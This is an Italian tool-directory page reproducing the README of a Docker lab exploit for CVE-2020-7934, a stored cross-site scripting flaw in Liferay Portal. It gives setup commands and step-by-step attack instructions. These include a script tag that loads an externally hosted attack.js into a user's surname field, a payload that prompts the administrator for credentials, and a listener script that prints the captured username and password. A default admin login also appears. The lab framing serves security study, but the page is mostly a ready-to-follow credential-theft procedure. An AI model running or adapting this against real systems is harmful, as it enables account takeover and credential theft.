Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
audit-xss-cve-2020-7934 — Exploit XSS basato su Docker per CVE-2020-7934 che colpisce il portale Liferay. Dimostra un cross-site scripting memorizzato tramite campi del profilo utente per rubare le credenziali dell'amministratore. | Kitploit
Strumenti/GitHubGitHub/giardinas-dev/audit-xss-cve-2020-7934
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubgiardinas-dev/audit-xss-cve-2020-7934

audit-xss-cve-2020-7934

Exploit XSS basato su Docker per CVE-2020-7934 che colpisce il portale Liferay. Dimostra un cross-site scripting memorizzato tramite campi del profilo utente per rubare le credenziali dell'amministratore.

Vedi Repository
454 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE 2020-7934

Come eseguire CVE

Requisiti

  1. docker

Osservazioni

è possibile mettere lo script di attacco online (dato il codice js) http://yourjavascript.com/ Il nostro script JS online per l'attacco html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

Comandi per la configurazione

  1. vai alla cartella radice di questo progetto
  2. esegui "sudo docker-compose up --build"
  3. nuovo terminale: esegui "docker inspect liferay" ==> e copia il valore IPAddress
  4. nuovo terminale: esegui "python api_attacker.py"
  5. apri un browser e vai a "http://IPAddress:8080" ==> dovresti ottenere il portale liferay come risposta
  6. per fermare ed eliminare i container usa "sudo docker-compose rm"

Istruzioni per l'attacco

  1. Registrati in liferay come utente, accedi e, nella sezione "siti disponibili", unisciti al sito "liferay".
  2. Cambia il "cognome" in uno script JS (direttamente () o tramite un "src =" http ... "")
  3. Accedi come admin liferay (username: [email protected], password: test)
  4. Vai ai siti disponibili e clicca su "liferay", si aprirà la pagina pubblica di questo sito.
  5. Vai alla nuova pagina, si aprirà un menu a destra, clicca su iscrizione.
  6. Seleziona l'utente registrato al passo 1. In quel momento lo script verrà eseguito. 5.1) Nello script attack.js la pagina chiederà le credenziali.
  7. Nel terminale del passo 5 (dei Comandi per la configurazione) verranno stampati username/password inseriti in 5.1 ( dall'admin ) )
Scarica lo strumento